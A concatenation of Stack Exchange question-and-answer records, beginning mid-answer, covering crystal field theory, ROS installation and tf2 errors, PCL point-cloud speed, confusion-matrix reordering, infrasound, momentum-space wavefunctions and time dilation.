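    return [w / Z for w in weights]

# Hypothetical level spacing in arbitrary units (not a real molecule).
levels = [0.0, 1.0, 2.0]

cold = populations(levels, T=0.05)  # essentially all population in the ground state
hot = populations(levels, T=5.0)    # excited states now carry noticeable probability
```

Raising `T` further would push the populations toward equal occupation of all levels, which is the expected high-temperature limit of the Boltzmann distribution.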
Note:
Your initial reaction to applying thermodynamic principles to a single molecule might be to think that it doesn't apply because we only have one molecule and not an ensemble. However, within the density matrix formulation of statistical mechanics, the quantum uncertainty of a system is entirely indistinguishable from the statistical uncertainty of a system. | {
"domain": "chemistry.stackexchange",
"id": 11317,
"tags": "thermodynamics"
} |
Crystal field splitting of other orbitals | Question: According to crystal field theory (CFT), $\mathrm{d}$-orbitals of central metal atom splits due to non uniform repulsion of ligands around the metal atom. Why isn't $\mathrm{p}$-orbital splitting discussed?
Argument: As in case of square planar complexes $\mathrm{(dsp^2)},$ $\mathrm{p}$-orbitals are involved which are facing different conditions of repulsion. So, $\mathrm{p}_{xy}$ must have higher energy than $\mathrm{p}_{xz}$ or $\mathrm{p}_{yz}.$ This happens in case of trigonal pyramidal structure too.
Answer:
According to Crystal Field Theory, d-orbitals of central metal atom splits due to non uniform repulsion of ligands around the metal atom. Why isn't p-orbital splitting discussed?
To be blunt, the reason nobody mentions p-orbital splitting or non-splitting is that neither the teacher nor the learner has ever understood crystal field theory properly in its true depth (including myself). They just propagate what they saw in standard textbooks and repeat the same in class; the students pass, never to see CFT again. The story ends. If that student ever becomes a teacher, the story continues.
You are mixing apples and oranges. Crystal field theory has nothing to do with hybridization. Hans Bethe, the man behind crystal field theory, wrote a 72-page, highly theoretical paper in Annalen der Physik in German. Translations are available, and I quote the abstract, where he does clarify what happens to p-orbitals. How many can claim that they read this paper completely before teaching CFT? I cannot. The abstract clarifies your misconception.
The influence of an electric field of prescribed symmetry (crystalline field) on an atom is treated wave-mechanically. The terms of the atom split up in a way that depends on the symmetry of the field and on the angular momentum l (or j) of the atom. No splitting of s terms occurs, and p terms are not split up in fields of cubic symmetry. For the case in which the individual electrons of the atom can be treated separately (interaction inside the atom turned off), the eigenfunctions of zeroth approximation are stated for every term in the crystal; from these there follows a concentration of the electron density along the symmetry axes of the crystal which is characteristic of the term. The magnitude of the term splitting is of the order of some hundreds of cm-1. For tetragonal symmetry, a quantitative measure of the departure from cubic symmetry can be defined, which determines uniquely the most stable arrangement of electrons in the crystal.
"domain": "chemistry.stackexchange",
"id": 13633,
"tags": "inorganic-chemistry, coordination-compounds, orbitals, crystal-field-theory"
} |
Why does ROS installation fail on 64bit Linux | Question:
Hi,
So my goal is to install ROS and Matlab on an Ubuntu 14.04 laptop, simple, right? I started with a fresh installation of Ubuntu 14.04 and went ahead to install ROS. I followed the installation instructions in the ROS wiki, but I always get the "ROS-indigo-desktop-full depends on ROS-indigo-symantics..." error and other dependency errors.
I googled this issue and tried every possible scenario or suggestion, but there wasn't much help. I figured it was related to my Ubuntu being 64bit, so I decided to erase everything and install Ubuntu 14.04 32bit. After I did that, ROS amazingly installed without a single problem and ran smoothly.
BUT then I discovered that Matlab can only install on a 64bit linux! I tried to find a workaround but with no luck, so back to square one.
I erased everything and installed Ubuntu 14.04 64bit, and back to the dependency hell!!! ROS does not install and no solution for that on the internet.
It's been 10 days now and I still cannot install ROS and Matlab together, I would appreciate any help please.
Originally posted by Amjadov on ROS Answers with karma: 16 on 2014-12-24
Post score: 0
Original comments
Comment by Andromeda on 2014-12-25:
I'm pretty sure you did the installation right, but in my 64 bit run both: ROS and Matlab. I haven't done nothing special, just followed the instruction on ROS website. Here my Xubuntu 14.04
Linux YE-166 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64 x86_64 x86_64 GNU/Linu
Comment by Amjadov on 2014-12-25:
It installed on the same laptop on Ubuntu 32bit smoothly without any problems, but on 64 bit it doesn't.
Btw I also tried to install it on a VM running 64bit Lubuntu but I got the same problem.
Comment by Andromeda on 2014-12-26:
Did you install a desktop version of your Ubuntu distro?
I never had a problem to install 64bit
Answer:
Thanks guys for the help.
I finally solved it! It turned out that after I installed Ubuntu 14.04 64bit, my version somehow got upgraded to 14.10 Utopic, and this version of Ubuntu is not compatible with ROS.
I re-installed Trusty and everything went fine.
Originally posted by Amjadov with karma: 16 on 2014-12-25
This answer was ACCEPTED on the original site
Post score: 0
Original comments
Comment by Andromeda on 2014-12-28:
check your answer as accepted | {
"domain": "robotics.stackexchange",
"id": 20430,
"tags": "ros, installation, dependencies"
} |
How can I restructure matrices to have non-zero elements close to the diagonal? | Question: I have a matrix $C \in \mathbb{N}^{n \times n}$. Semantically, it is a confusion matrix where the element $c_{ij}$ denotes how often members of class $i$ are predicted by a given classifier as members of class $j$.
The order of elements does not matter, but $c_{ii}$ has to be the correct prediction of class $i$. So for any given matrix $C$ you can swap columns if you swap the same rows.
How can I order the classes $1, \dots, n$ so that the biggest elements are close to the diagonal?
I thought one might pose this as an optimization problem, e.g. minimize
$$\sum_{i = 1}^n \sum_{j=1}^n C_{ij} \cdot {|i-j|}$$
How could I minimize this?
Code and example
I've already visualized a $369 \times 369$ matrix without any optimization. The confusion matrix as a JSON file and the code are here.
Without modification, you get a score of 303535 for:
This looks as if there could be some improvement. A quick first thought was to just randomly swap rows. Letting this run for $10^4$ steps (~5 minutes) leads to a score of 82552 and a visualization which looks a bit cleaner:
Doing this, I realized that my score might also need some improvement. Instead of moving elements to the diagonal, it would be nice if big blocks within the matrix contained only zeros.
The total number of possibilities to arrange the items in $C$ is equal to the number of permutations of a list of length $n$ and hence it is $n!$. Hence for $369$ classes it is already $369! \approx 10^{788}$ - too much to brute force.
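The random-swapping idea mentioned above can be sketched as a simple hill climb on the score (a toy example with a hypothetical $3 \times 3$ matrix; note that a row swap must always be paired with the matching column swap so that $c_{ii}$ stays the correct prediction of class $i$):

```python
import random

def score(C, perm):
    # sum_{i,j} C[perm[i]][perm[j]] * |i - j|: penalises big entries far from the diagonal.
    n = len(C)
    return sum(C[perm[i]][perm[j]] * abs(i - j)
               for i in range(n) for j in range(n))

def random_swap_optimize(C, steps=2000, seed=0):
    # Hill climbing: swap two class labels (i.e. swap a row together with the
    # matching column) and keep the swap only if the score does not get worse.
    rng = random.Random(seed)
    n = len(C)
    perm = list(range(n))
    best = score(C, perm)
    for _ in range(steps):
        i, j = rng.randrange(n), rng.randrange(n)
        perm[i], perm[j] = perm[j], perm[i]
        s = score(C, perm)
        if s <= best:
            best = s
        else:
            perm[i], perm[j] = perm[j], perm[i]  # undo a worsening swap
    return perm, best

# Toy confusion matrix: classes 0 and 2 are often confused with each other,
# so a good ordering places them next to each other.
C = [[5, 0, 4],
     [0, 5, 0],
     [4, 0, 5]]
perm, best = random_swap_optimize(C)
```

Accepting equal-score swaps lets the search drift across plateaus; lowering the acceptance rule to "strictly better only" would make it a plain greedy climb, and adding a temperature schedule would turn it into full simulated annealing.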
See also
My similar question on datascience.SE
Answer: The random swapping approach (simulated annealing with extremely low temperature) yields to a score of 64496 (20 minutes or so with Python and seed 0, ~60s with C++ and playing with seeds by a friend -.-). The permutation is
[213, 201, 367, 34, 368, 174, 249, 193, 159, 275, 225, 276, 194, 300, 191, 362, 113, 230, 158, 5, 4, 16, 352, 126, 265, 49, 224, 139, 187, 221, 228, 192, 156, 205, 204, 203, 241, 208, 214, 166, 67, 40, 52, 283, 124, 354, 133, 152, 173, 206, 235, 231, 237, 223, 217, 138, 118, 277, 361, 269, 344, 98, 258, 251, 30, 119, 122, 339, 309, 240, 245, 26, 226, 242, 232, 218, 110, 172, 86, 282, 297, 137, 21, 146, 62, 29, 293, 189, 171, 210, 84, 250, 136, 3, 304, 335, 154, 292, 78, 11, 266, 116, 164, 129, 148, 144, 195, 327, 306, 337, 9, 47, 168, 120, 128, 259, 261, 323, 254, 121, 200, 183, 256, 246, 85, 72, 305, 77, 76, 255, 336, 55, 46, 89, 73, 341, 100, 294, 145, 163, 87, 37, 185, 199, 15, 313, 88, 268, 264, 273, 69, 59, 44, 2, 106, 303, 82, 149, 326, 197, 279, 111, 38, 366, 57, 329, 68, 340, 257, 334, 93, 295, 286, 353, 365, 298, 285, 364, 91, 92, 90, 316, 252, 19, 165, 342, 125, 274, 176, 143, 239, 288, 95, 96, 324, 325, 28, 212, 253, 81, 79, 80, 318, 94, 299, 71, 291, 64, 132, 23, 278, 338, 308, 160, 7, 115, 247, 347, 147, 271, 188, 281, 272, 280, 155, 35, 349, 157, 177, 180, 202, 108, 350, 345, 97, 51, 141, 284, 355, 179, 42, 33, 70, 99, 45, 109, 178, 181, 103, 207, 220, 102, 211, 209, 196, 127, 41, 346, 351, 359, 320, 311, 13, 43, 287, 328, 357, 83, 310, 12, 161, 135, 131, 360, 39, 302, 1, 322, 123, 167, 6, 117, 31, 330, 356, 74, 75, 151, 104, 262, 289, 296, 140, 101, 236, 312, 343, 150, 348, 56, 234, 27, 14, 114, 331, 260, 314, 17, 54, 321, 105, 263, 130, 20, 186, 190, 63, 22, 162, 134, 363, 333, 301, 0, 169, 170, 175, 10, 112, 317, 61, 50, 248, 18, 315, 60, 32, 222, 244, 290, 48, 36, 307, 184, 58, 233, 238, 229, 227, 219, 153, 66, 319, 332, 358, 25, 53, 270, 182, 8, 216, 65, 24, 267, 107, 215, 142, 198, 243]
which corresponds to the symbol classes
['\blacktriangleright', '\nvDash', '\AE', '7', '\guillemotleft', '\perp',
'\bot', '\therefore', '\boxtimes', '\vdots', '\Leftarrow',
'\ddots', '\because', '\iddots',
'\multimap', '\L', '+', '\nearrow', '\boxplus', 'F', 'E', 'Q', '\checked', '\checkmark', '\rceil', 'h', '\uparrow',
'\div', '\doteq', '\longmapsto', '\mapsto', '\pitchfork', '\boxdot',
'\varsubsetneq', '\subsetneq', '\nsubseteq', '\nRightarrow', '\gtrless', '\triangleq', '\parr', '\Sigma', '\sum', 'k', '\sharp', '\#', '\sun', '\ast', '\star', '\not\equiv', '\neq', '\rightleftarrows',
'\rightleftharpoons', '\rightrightarrows', '\Longrightarrow', '\Rightarrow', '\pm',
'\dots', '\dotsc', '\aa', ']', '\ohm', '\Omega',
'\exists', '\ni', '3', '\}', '\pounds', '\mathscr{L}', '\mathcal{L}',
'\twoheadrightarrow', '\shortrightarrow', '\rightarrow', '\longrightarrow',
'\nrightarrow', '\rightharpoonup', '\hookrightarrow', '\cong', '\equiv',
'\Xi', '\diamondsuit', '\lozenge', '\diamond', 'V', '\vee', 'v', '2', '\sphericalangle', '\simeq', '\approx', '\gtrsim', '\nu', '\forall', '\triangleright',
'D', '\mathcal{D}', '\mathscr{D}',
'\barwedge', '\sqrt{}', '\iota', 'L', '\lfloor', '\{', '\coprod', '\amalg', '\sqcup', '\mp', '\between', '\mathds{E}', '\mathcal{F}', '\mathscr{F}', 'J', 'f', '\fint', '\S', '\mathsection', '\Im', '\nexists', '\mathfrak{X}', '\hbar', '\dag', '\nmid', '\vdash', '\notin', '\lightning', '\xi', '\zeta', '\mathcal{E}', '\varepsilon', '\epsilon', '\in', '\mathscr{E}', 'n', 'e', '\varrho', '\eta', '\mathscr{S}', '\int', '\square', '\sqcap', '\prod', '\Pi', '\pi', '\models', '\vDash', 'P', '\mathcal{P}', '\rho', '[', '\lceil', '\llbracket', '\Gamma', 'r', 'c', 'C', '\subset',
'\mathcal{C}', '\Lambda', '\wedge', '\mathds{C}', '\varpropto', '\infty', '\propto', '\alpha', '\ae', 'p', '\mathds{P}', '\gamma', '\mathscr{P}',
'\wp', '\mathscr{C}', '\varphi', '\triangledown', '\nabla', '\diameter',
'\o', '\varnothing', '\emptyset', '\O', '\phi', '\Phi', '\tau',
'\mathcal{T}', '\top', 'T', '\oint', '\celsius', '\%', '\rrbracket', '\frown', '\cap', '\curvearrowright', '\clubsuit', '\psi', '\Psi', '\mathbb{1}', '\mathds{1}', '1', '\trianglelefteq', '\ell', '\lambda',
'\kappa', '\varkappa', '\mathcal{X}', '\chi', '\vartriangle', '\Delta',
'\triangle', 'x', '\times', 'X', '\aleph', '\mathscr{H}', '\mathcal{H}',
'\rtimes', 'H', '\$', '\vartheta', '\astrosun', '\odot',
'\|', '\parallel', '\angle', '/', '\prime', '\circledcirc', '8', '\leftmoon',
'\ltimes', '\prec', '\preceq', '\sqsubseteq', '\subseteq', '\female',
'\venus', '\omega', 'j', '\setminus', '\backslash', '\Bowtie', '\bowtie',
'a', '6', '\delta', '\partial', 'd', '\supseteq', '\succ', '\succeq',
'\geq', '\geqslant', '\searrow', '\leq', '\leqslant', '\lesssim',
'\preccurlyeq', '\circledR', '\sigma', '\mars', '\male', '\mathbb{H}',
'\mathfrak{A}',
'\mathcal{N}', 'N', 'b', '\flat', '\mathds{N}', '\mathbb{N}', '\mu', '\mathcal{M}', 'M',
'\circledast', '\otimes',
'\oplus', '\ss', '\beta', '\mathcal{B}', 'B', '\mathfrak{S}', '\&',
'\with', 'G', '\copyright', '4', '\mathds{Q}', '\mathbb{Q}', '\theta',
'\Theta', '\ominus', '<', '\langle', '\heartsuit', '\blacksquare',
'\bullet', '\cdot', '\circlearrowright', '\mathcal{O}', '\degree',
'\circ', '\fullmoon', 'o', '\circlearrowleft', '0', 'O',
'\mathbb{R}', '\mathds{R}', '\Re', '\mathcal{R}', 'R',
'm', '\mathfrak{M}', '>', '\rangle', '\cup', 'U', '\sim', '\backsim', 'w', 'W', '\lhd', '\triangleleft', '\AA', '\mathscr{A}', '\mathcal{A}', 'A', '\varoiint', '\oiint', '\asymp', 'K', '-', '\mathcal{U}', 'u', 'i', '\varpi', 'S',
'\mathcal{S}', 's', '5', '\leftarrow', '\mapsfrom', '\neg', 'g', '9',
'\mathcal{G}', '\dashv', 'q',
'\leadsto', '\rightsquigarrow', '\leftrightarrow', '\Leftrightarrow', '\Longleftrightarrow',
'\wr', 'z', '\mathcal{Z}', '\mathds{Z}', '\mathbb{Z}', 'Z',
'l', '|', '\mid', 'I', '\downarrow',
'y', 'Y', '\rfloor', '\supset', '\Downarrow', '\uplus', '\Vdash', '\upharpoonright']
As expected, this method automatically finds groups of classes which are similar, such as 'D', '\mathcal{D}', '\mathscr{D}'.
It leads to the following confusion matrix:
Thoughts about good solutions / minima
This optimization problem will most likely get the best results if all groups of similar classes are together. For this dataset, the groups are D-shaped, O-shaped, arrow-shaped, ...
For a good classifier, it is expected that there are many errors between members of a group and few (even none) between groups. Hence the ordering of groups does not matter (much).
If the classifier can distinguish many classes really well, a lot of groups exist. If there are $k$ groups, there will be $k!$ solutions to the confusion matrix optimization problem which will have almost the same score. For the HASYv2 dataset and the CNN classifier I expect there to be at least 50 groups (hence $50! \approx 10^{64}$ similar solutions which are all close to the minima / minimum. | {
"domain": "cs.stackexchange",
"id": 8412,
"tags": "optimization, matrices"
} |
Will there be a sound if we oscillate something at more than 10Hz? | Question: We all know that we hear sound due to vibration in air. So I was wondering: if we make an oscillator which does not make any internal sound, but it oscillates at more than 20Hz, will we be able to hear any sound due to those vibrations in the air (assuming the amplitude is large enough that we could hear it)?
Answer: Yes, a sound will be generated if we oscillate something in the air in the frequency range of $[0.1-20]\text{Hz}$; it's called infrasound. The fact that people can't hear infrasound doesn't invalidate it being a sound. Indeed, some animals can hear and produce infrasound, such as the Sumatran rhinoceros, which produces sounds with frequencies as low as 3 Hz, or alligators, which are known to use infrasound to communicate over distances.
"domain": "physics.stackexchange",
"id": 94731,
"tags": "acoustics, frequency"
} |
ROS Answers SE migration: URDF Guide | Question:
Dear ROS users,
please, give me a hint: where could I find a guide to the Unified Robot Description Format (URDF)?
Cheers!
Originally posted by ASMIK2011ROS on ROS Answers with karma: 62 on 2011-04-25
Post score: 1
Original comments
Comment by mjcarroll on 2011-04-25:
I was half-way working on a "real-life" example, but never finished, maybe this is motivation to.
Answer:
The best place to start is probably the URDF tutorials list
Originally posted by JeffRousseau with karma: 1607 on 2011-04-25
This answer was ACCEPTED on the original site
Post score: 8 | {
"domain": "robotics.stackexchange",
"id": 5438,
"tags": "urdf"
} |
Momentum space representation and time dependency | Question: I'm currently struggling to understand how to find the momentum representation of a wave function, and I could use some help understanding this. I know from various sources that the Fourier transform is an important key to understanding and computing this.
I have one proposed way of finding the momentum representation, and it involves de Broglie's momentum–wavelength relation, where we can express $\vec{p}$ as $\hbar\vec{k}$. Let's study the given wave function:
$$\Psi(\vec{k}) = \frac{1}{(2\pi)^\frac{3}{2}}\int d^3r e^{-i\vec{k}\vec{r}}\psi(\vec{r})$$
If I were to substitute $\vec{k}$ with $\frac{\vec{p}}{\hbar}$ (de Broglie relation), then we would get the following function:
$$\Psi(\frac{\vec{p}}{\hbar}) = \frac{1}{(2\pi)^\frac{3}{2}}\int d^3r e^{-i\frac{\vec{p}}{\hbar}\vec{r}}\psi(\vec{r})$$
My thought is that I can now express the momentum representation of $\Psi(\vec{k})$ as $$\Phi(\vec{p}) = \frac{1}{(2\pi)^\frac{3}{2}}\int d^3r e^{-i\frac{\vec{p}}{\hbar}\vec{r}}\psi(\vec{r})$$ where I have combined $\vec{p}$ with $\hbar$ as it now only depends on $\vec{p}$ with a factor of constant $\hbar^{-1}$
Are these assumptions that I've made correct, and if not, how can I instead think to make it correct?
If I wanted to determine $\Psi(\vec{k},t)$ at a time $t > 0$, could I just plug the term $\omega t$ into the exponential, like this:
$$\Psi(\vec{k},t) = \frac{1}{(2\pi)^\frac{3}{2}}\int d^3r e^{-i(\vec{k}\vec{r}-\omega t)}\psi(\vec{r})$$
Same question here, are my assumptions correct, and if not, how can I think differently to solve this? Thank you.
Answer: For the first point, you are basically right, the only trouble being the normalisation. Here, assuming the position-space wavefunction is normalized :
$$\int \text d^3\vec x |\psi(\vec x)|^2 = 1$$
we know that its Fourier transform (with the convention used in OP) is normalized as well :
$$\int \text d^3 \vec k|\Psi(\vec k)|^2 = 1$$
Then, to give a normalized momentum-space wavefunction $\Phi(\vec p)$, we need an extra factor of $\hbar^{-3/2}$ :
\begin{align}
\Phi(\vec p) &= \frac{1}{\hbar^{3/2}}\Psi(\vec p/\hbar) \\
&= \frac{1}{(2\pi\hbar)^{3/2}}\int\text d^3 x e^{-i \vec p\cdot\vec x/\hbar }\psi(\vec x)
\end{align}
For the second point, the relation between the position-space wavefunction and the momentum-space wavefunction at the same time $t$ is always the same :
$$\Phi(\vec p,t)= \frac{1}{(2\pi\hbar)^{3/2}}\int\text d^3 x e^{-i \vec p\cdot\vec x/\hbar }\psi(\vec x,t)$$
ie we only take the spatial Fourier transform.
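The normalization claim can be checked numerically. The following is a hedged one-dimensional sketch (a normalized Gaussian $\psi(x)$ on a finite grid, with an arbitrary test value $\hbar = 2$ in natural units): the Fourier transform satisfies $\int|\Psi(k)|^2\,dk = 1$, and it is only the extra $\hbar^{-1/2}$ factor (the 1D analogue of $\hbar^{-3/2}$ above) that makes $\int|\Phi(p)|^2\,dp = 1$ as well.

```python
import numpy as np

a = 1.0
x = np.linspace(-10, 10, 801)
dx = x[1] - x[0]
psi = (1 / (np.pi * a**2))**0.25 * np.exp(-x**2 / (2 * a**2))  # normalized Gaussian

# Psi(k) = (2*pi)^(-1/2) * integral of e^{-ikx} psi(x) dx, evaluated as a Riemann sum.
k = np.linspace(-10, 10, 801)
dk = k[1] - k[0]
Psi = (np.exp(-1j * np.outer(k, x)) @ psi) * dx / np.sqrt(2 * np.pi)

# Momentum-space wavefunction: Phi(p) = hbar^{-1/2} * Psi(p/hbar) in 1D.
hbar = 2.0                 # arbitrary test value in natural units
p = hbar * k
dp = p[1] - p[0]
Phi = Psi / np.sqrt(hbar)

norm_x = np.sum(np.abs(psi)**2) * dx   # ~ 1
norm_k = np.sum(np.abs(Psi)**2) * dk   # ~ 1
norm_p = np.sum(np.abs(Phi)**2) * dp   # ~ 1 only because of the hbar^{-1/2} factor
```

Dropping the `1 / np.sqrt(hbar)` factor would leave `norm_p` equal to $\hbar$ instead of 1, which is exactly the bookkeeping issue the answer points out.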
Up to this moment, we were only dealing with kinematics. To relate the wave-functions at different times, we need to specify the dynamics of the system, which is done by choosing a Hamiltonian operator. For a free non-relativistic particle, whose Hamiltonian is $H = -\frac{\hbar ^2 }{2m} \nabla^2$, we see that the Schrödinger equation implies that the momentum-space wavefunction satisfies :
$$i\hbar \partial_t\Phi(\vec p,t) = \frac{p^2}{2m}\Phi(\vec p,t)$$
This is solved by :
$$\Phi(\vec p,t) = e^{-iE_p t/\hbar} \Phi(\vec p,0)$$
with $E_p = \hbar \omega_p = \frac{p^2}{2m}$. Plugging back in the definition of $\Phi(\vec p,0)$, we obtain :
$$\Phi(\vec p,t ) = \frac{1}{(2\pi\hbar)^{3/2}} \int \text dx e^{i(\vec p \cdot \vec x - E_p t)/\hbar} \psi(\vec x,0)$$ | {
"domain": "physics.stackexchange",
"id": 95100,
"tags": "quantum-mechanics, homework-and-exercises, fourier-transform"
} |
Time Dilation In Between Two Objects | Question: Suppose an object A is exactly halfway in between two identical objects B and C, so the magnitude of the cumulative acceleration on object A is $0$. Objects A, B, and C have no velocity relative to each other. Will the time dilation for object A be the same as if there was one object with the mass of objects B and C combined, or the same as if objects B and C did not exist?
Answer: Gravitational time dilation is not caused by acceleration. In most situations it is related to how deep the gravitational potential well is.
So if two stars are orbiting you at a distance $d$ you will experience more gravitational time dilation than if you were a distance $d$ away from just one of them.
So the time dilation is cumulative.
Thus there will not be zero time dilation and it will generally be as strong as if there was one larger mass nearby. | {
"domain": "physics.stackexchange",
"id": 24509,
"tags": "general-relativity, time-dilation"
} |
Point Cloud Filtering and processing using PCL is slow | Question:
Hi All
I have code for a ROS node that subscribes to a PointCloud2 topic published by iai_kinect2's kinect bridge. My problem is that the code runs quite slowly. I have narrowed the slowdown down to my spinOnce() statement, so I'm pretty sure it's my callback function that's being slow. However, my callback uses the recommended way of converting the pc2 message into a PCL point cloud. Here it is for reference:
void cloudCallback(const sensor_msgs::PointCloud2ConstPtr& msg){
// Create a container for the data.
pcl::PCLPointCloud2 pcl_pc2;
pcl_conversions::toPCL(*msg,pcl_pc2);
pcl::fromPCLPointCloud2(pcl_pc2,*cloud);
pcl::removeNaNFromPointCloud(*cloud,*outputCloud, indices);
sor.setInputCloud(outputCloud);
sor.setLeafSize (0.01f, 0.01f, 0.01f);
sor.filter (*outputCloudFilt);
}
All the objects used here were pre-initialised before main(). The code runs just as slowly if I remove the filtering from the callback.
I should also add that the speed is slow independently of how many points are in the cloud.
EDIT: Using fromROSMsg() doesn't help with my problem.
Originally posted by christophecricket on ROS Answers with karma: 21 on 2020-03-24
Post score: 0
Original comments
Comment by gvdhoorn on 2020-03-24:
Something to check: did you compile with optimisations enabled?
And not an answer, but pcl_ros comes with a few PCL filters wrapped in nodelets: wiki/pcl_ros - Nodelets.
Comment by stevemacenski on 2020-03-24:
Also, please give us your full code, for all we know the issue is somewhere over there. Also please describe what "slow" means to you. Give us some metrics to work with.
Comment by christophecricket on 2020-03-24:
Yeah fair enough. I meant that my code was running at like 0.1Hz, which is way slower than you would actually expect.
Answer:
Thanks @gvdhoorn, turning on compiler optimisation gives me speeds more in line with what I expect (~20-30Hz, and it actually scales with the size of the cloud). To anyone else experiencing this problem: set the following flag in catkin_make:
-DCMAKE_BUILD_TYPE=Release
Originally posted by christophecricket with karma: 21 on 2020-03-24
This answer was ACCEPTED on the original site
Post score: 2
Original comments
Comment by stevemacenski on 2020-03-24:
Sounds about right! Was this for setting in your application or in your PCL/PCL ROS build itself?
Comment by christophecricket on 2020-03-25:
I just turned it on for the entirety of the packages in my src/ folder.
Comment by stevemacenski on 2020-03-25:
And what’s in that? PCL, pcl_perception? Just your application code?
Comment by christophecricket on 2020-03-25:
Oooh I just got what you're trying to ask. No it's just my application code. I didn't recompile the binaries for PCL or ROS.
Comment by stevemacenski on 2020-03-25:
ah ok,thanks | {
"domain": "robotics.stackexchange",
"id": 34629,
"tags": "ros-melodic"
} |
Time Dilation Effects from simply being on a spinning planet orbiting a star in a rotating galaxy in an expanding universe. | Question: I am a layman, so take this with a grain of salt.
I saw a TV show the other day which showed a Russian Cosmonaut who had spent more time in space than any other human. The relativistic effects of the low gravity and extreme speeds at which he had spent a decent part of his life had pushed him a small, but surprisingly non-trivial fraction of a second into the "future" as compared to the rest of us observers here on earth. I want to say it was something like a 50th of a second.
What, if any, are the relativistic effects all of us experience in an average lifespan simply by being on the earth as it travels through space in orbit and as the galaxy rotates and the universe expands.
By effects I mean as compared to a hypothetical observer who is able to remain completely motionless in space. Is it even measurable?
I know gravity is not being taken into account, so is this question even answerable?
Thanks for your patience with my question.
Answer: As the comments say, you have to be precise about your reference point when you talk about time dilation. Time dilation is always relative to something else.
But there is an obvious interpretation to your question. Suppose you have an observer well outside the Solar system and stationary with respect to the Sun. For that observer your clock on Earth is ticking slowly for two reasons:
you're in a gravitational well, so there is gravitational time dilation.
you're on the Earth which is hurtling round the Sun at about (it varies with position in the orbit) 30 km/sec. The Earth's surface is also moving as the Earth rotates, but the maximum velocity (at the equator) is only 0.46 km/sec so it's small compared to the orbital velocity and we'll ignore it.
As it happens, the problem of combined gravitational and Lorentz time dilation has been treated in the question How does time dilate in a gravitational field having a relative velocity of v with the field?, but that has some heavy maths, so let's do a simplified calculation here.
The gravitational time dilation, i.e. the factor that time slows relative to the observer outside the Solar System is:
$$ \frac{t}{t_0} = \sqrt{1 - \frac{2GM}{rc^2}} $$
where $M$ is the mass of the object and $r$ is the distance from it.
For the Sun $M = 1.9891 \times 10^{30}$ kilograms and $r$ (the orbital radius of the Earth) $\approx 1.5 \times 10^{11}$ metres, so the time dilation factor is $0.99999999017$.
For the Earth $M = 5.97219 \times 10^{24}$ kilograms and $r$ (the radius of the Earth) $\approx 6.4 \times 10^{6}$ metres, so the time dilation factor is $0.999999999305$.
The Lorentz factor due to the Earth's orbital motion is:
$$\begin{align}
\frac{1}{\gamma} &= \sqrt{1 - v^2/c^2} \\
&= 0.999999995
\end{align}$$
And to a first approximation we can simply multiply all these factors together to get the total time dilation factor:
$$ \frac{t}{t_0} = 0.999999984 $$
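These figures are easy to reproduce programmatically. Here is a sketch using the constants quoted above (rounded input values, so the last digits may differ slightly from the text):

```python
import math

G = 6.674e-11   # gravitational constant, m^3 kg^-1 s^-2
c = 2.998e8     # speed of light, m/s

def gravitational_factor(M, r):
    # t/t0 = sqrt(1 - 2GM/(r c^2))
    return math.sqrt(1 - 2 * G * M / (r * c**2))

sun = gravitational_factor(1.9891e30, 1.5e11)    # Sun's well at Earth's orbital radius
earth = gravitational_factor(5.97219e24, 6.4e6)  # Earth's well at its surface
lorentz = math.sqrt(1 - (3.0e4 / c)**2)          # ~30 km/s orbital speed

total = sun * earth * lorentz            # ~0.999999984

lifetime = 70 * 365.25 * 24 * 3600       # "three score and ten" in seconds
lag = (1 - total) * lifetime             # ~34 seconds
```

Multiplying the factors is the first-approximation step mentioned in the text; since each factor differs from 1 by only parts in $10^8$, the cross terms are utterly negligible.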
To put this into context, in a lifetime of three score and ten you on Earth would age about 34 seconds less than the observer watching from outside. | {
"domain": "physics.stackexchange",
"id": 12044,
"tags": "general-relativity, time"
} |
tf2: I can broadcast transfroms but I cannot listen to them. I keep getting [ERROR] : Lookup would require extrapolation | Question:
Hello
I am trying to do a simple broadcast/listen of tf2 where I broadcast a frame and then listen to it and transform a point in that frame. However, the broadcasting script is working as intended but I cannot listen to it and I keep getting:
[ERROR] [1607460129.073986]: Lookup would require extrapolation 0.009213686s into the past. Requested time 1607460126.067262173 but the earliest data is at time 1607460126.076475859, when looking up transform from frame [base_laser] to frame [base_link]
Here are the two scripts:
Broadcaster:
import rospy
import tf2_ros
import geometry_msgs.msg
from tf.transformations import *
import tf_conversions
if __name__ == "__main__":
rospy.init_node('tf2_turtle_broadcaster')
rate = rospy.Rate(100)
while not rospy.is_shutdown():
broadcaster = tf2_ros.TransformBroadcaster()
t = geometry_msgs.msg.TransformStamped()
t.header.stamp = rospy.Time.now()
t.header.frame_id = "base_link"
t.child_frame_id = "base_laser"
t.transform.rotation = geometry_msgs.msg.Quaternion(0, 0, 0, 1)
t.transform.translation = geometry_msgs.msg.Vector3(0.1, 0, 0.2)
broadcaster.sendTransform(t)
rate.sleep()
Listener:
import rospy
import tf2_ros
import geometry_msgs.msg
from tf2_geometry_msgs import PointStamped
from tf.transformations import *
if __name__ == "__main__":
rospy.init_node('robot_tf_listener')
laser_point = PointStamped()
laser_point.header.stamp = rospy.Time.now()
laser_point.header.frame_id = "base_laser"
laser_point.point.x = 1
laser_point.point.y = 0.2
laser_point.point.z = 0
tfBuffer = tf2_ros.Buffer()
listener = tf2_ros.TransformListener(tfBuffer)
rate = rospy.Rate(10)
while not rospy.is_shutdown():
try:
rospy.loginfo('1')
tran = tfBuffer.transform(laser_point, "base_link", timeout=rospy.Duration(3))
rospy.loginfo('2')
except Exception as e:
rospy.logerr(e)
rate.sleep()
Originally posted by Forenkazan on ROS Answers with karma: 23 on 2020-12-08
Post score: 0
Original comments
Comment by jayess on 2020-12-08:
Are you using two different machines? If so, this may have to do with the machines not having their clocks synced. See the network setup on the wiki.
Answer:
Use Time(0) instead of Time.now(). For more detail, check out the following: http://wiki.ros.org/tf/Tutorials/tf%20and%20Time%20(Python)
Originally posted by apawlica with karma: 46 on 2020-12-08
This answer was ACCEPTED on the original site
Post score: 0
Original comments
Comment by jayess on 2020-12-08:
The op is using tf2 and the tutorial that you're linking to is the deprecated tf package.
Comment by apawlica on 2020-12-08:
Wouldn't the relevant bit (using Time(0) instead of Time.now()) still be applicable, as it's a timing issue and not unique to tf2?
Comment by jayess on 2020-12-08:
See this answer | {
"domain": "robotics.stackexchange",
"id": 35851,
"tags": "ros, python, transform, tf2"
} |
Job Scheduling Algorithm | Question: Changed Program based on suggestions. New Code: Job Scheduling Algorithm 2
